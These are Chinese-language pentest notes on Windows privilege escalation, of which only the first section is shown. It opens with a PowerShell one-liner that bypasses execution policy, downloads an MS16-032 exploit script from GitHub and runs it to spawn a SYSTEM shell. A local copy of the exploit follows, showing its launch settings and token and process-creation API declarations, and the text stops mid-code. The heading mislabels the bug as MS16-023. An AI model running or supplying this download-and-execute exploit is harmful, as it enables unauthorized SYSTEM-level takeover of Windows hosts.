MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包

0x01 MS16-023提权

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c start cmd /k echo Hello, World!'"

从远程下载并执行 Invoke-MS16-032 这个 PowerShell 脚本,利用成功后会新开一个 SYSTEM 权限的命令行窗口。

(虚拟机调成2个CPU及以上,才能运行成功)

 

也可以自己修改 PowerShell 脚本:在脚本开头的两行(`$Application` 和 `$Commandline`)中修改要启动的程序及其命令行参数。

powershell -nop -ep bypass -File MS16-023.ps1

# ================= edit the command here ================= #
# $Application is the executable to launch and $Commandline its arguments;
# presumably consumed further down by the script (not shown in this excerpt).
$Application = "cmd.exe"
$Commandline = "/c start cmd /k echo Hello, World!"
# ========================================================== #

    Add-Type -TypeDefinition @"

    using System;

    using System.Diagnostics;

    using System.Runtime.InteropServices;

    using System.Security.Principal;

 

    /// <summary>
    /// Managed mirror of the Win32 PROCESS_INFORMATION structure. It is filled in by
    /// Advapi32.CreateProcessWithLogonW through its out parameter. Sequential layout keeps
    /// the fields in declaration order so the native side sees the expected memory layout.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;   // handle to the newly created process
        public IntPtr hThread;    // handle to its primary thread
        public int dwProcessId;
        public int dwThreadId;
        // NOTE(review): nothing in this excerpt closes hProcess/hThread — confirm the calling
        // script releases them (CloseHandle) so kernel objects are not leaked.
    }

 

    /// <summary>
    /// Managed mirror of the Win32 STARTUPINFOW structure, passed by reference to
    /// Advapi32.CreateProcessWithLogonW. CharSet.Unicode marshals the string fields as
    /// UTF-16, matching the wide (W) entry point imported below.
    /// </summary>
    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public Int32 cb;               // size of this structure in bytes; the caller is expected to fill it in
        public string lpReserved;
        public string lpDesktop;       // window station / desktop for the new process
        public string lpTitle;
        public Int32 dwX;
        public Int32 dwY;
        public Int32 dwXSize;
        public Int32 dwYSize;
        public Int32 dwXCountChars;
        public Int32 dwYCountChars;
        public Int32 dwFillAttribute;
        public Int32 dwFlags;          // bitmask selecting which of the following fields are honored
        public Int16 wShowWindow;
        public Int16 cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;       // standard I/O handles, used only when the matching dwFlags bit is set
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

 

    /// <summary>
    /// Managed mirror of SECURITY_QUALITY_OF_SERVICE (impersonation settings attached to a
    /// handle). It is not referenced by any declaration visible in this excerpt.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct SQOS
    {
        public int Length;               // structure size in bytes
        public int ImpersonationLevel;   // SECURITY_IMPERSONATION_LEVEL value
        public int ContextTrackingMode;
        // NOTE(review): a C# bool inside a struct marshals as a 4-byte Win32 BOOL by default;
        // confirm that width matches the native field before relying on this layout.
        public bool EffectiveOnly;
    }

 

    /// <summary>
    /// P/Invoke declarations for the advapi32 process-creation and access-token functions
    /// used by the script. Every import sets SetLastError=true so the native failure code
    /// can be read with Marshal.GetLastWin32Error() right after a call returns false.
    /// </summary>
    public static class Advapi32
    {
        /// <summary>
        /// Creates a new process under a different logon. String arguments are marshaled as
        /// Unicode to match the W entry point. Returns false on failure.
        /// </summary>
        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
        public static extern bool CreateProcessWithLogonW(
            String userName,
            String domain,
            String password,
            int logonFlags,
            String applicationName,
            String commandLine,
            int creationFlags,
            int environment,             // environment block; declared as int here, so only 0 (NULL) is meaningful
            String currentDirectory,
            ref  STARTUPINFO startupInfo,
            out PROCESS_INFORMATION processInformation);

        /// <summary>
        /// Assigns an impersonation token to a thread (a null token clears it).
        /// Thread is a pointer to the thread handle; a null pointer selects the calling thread.
        /// </summary>
        [DllImport("advapi32.dll", SetLastError=true)]
        public static extern bool SetThreadToken(
            ref IntPtr Thread,
            IntPtr Token);

        /// <summary>
        /// Opens the access token associated with a thread with the requested DesiredAccess
        /// rights; the handle is returned through TokenHandle.
        /// </summary>
        [DllImport("advapi32.dll", SetLastError=true)]
        public static extern bool OpenThreadToken(
            IntPtr ThreadHandle,
            int DesiredAccess,
            bool OpenAsSelf,
            out IntPtr TokenHandle);

        /// <summary>
        /// Opens the access token associated with a process. The handle is written through
        /// TokenHandle, which this declaration types as ref rather than out.
        /// </summary>
        [DllImport("advapi32.dll", SetLastError=true)]
        public static extern bool OpenProcessToken(
            IntPtr ProcessHandle,
            int DesiredAccess,
            ref IntPtr TokenHandle);

        /// <summary>
        /// Creates an impersonation-token copy of ExistingTokenHandle at the given
        /// impersonation level; the new handle is written through DuplicateTokenHandle.
        /// </summary>
        [DllImport("advapi32.dll", SetLastError=true)]
        public extern static bool DuplicateToken(
            IntPtr ExistingTokenHandle,
            int SECURITY_IMPERSONATION_LEVEL,
            ref IntPtr DuplicateTokenHandle);
    }

 

    public static class Kernel32

    {

        /// <summary>
        /// Raw import of kernel32 GetLastError.
        /// NOTE(review): reading the last-error value through a separate P/Invoke is unreliable,
        /// because the runtime may issue its own Win32 calls between the failing call and this
        /// one; Marshal.GetLastWin32Error() together with SetLastError=true on the import is the
        /// supported way to retrieve it.
        /// </summary>
        [DllImport("kernel32.dll")]
        public static extern uint GetLastError();
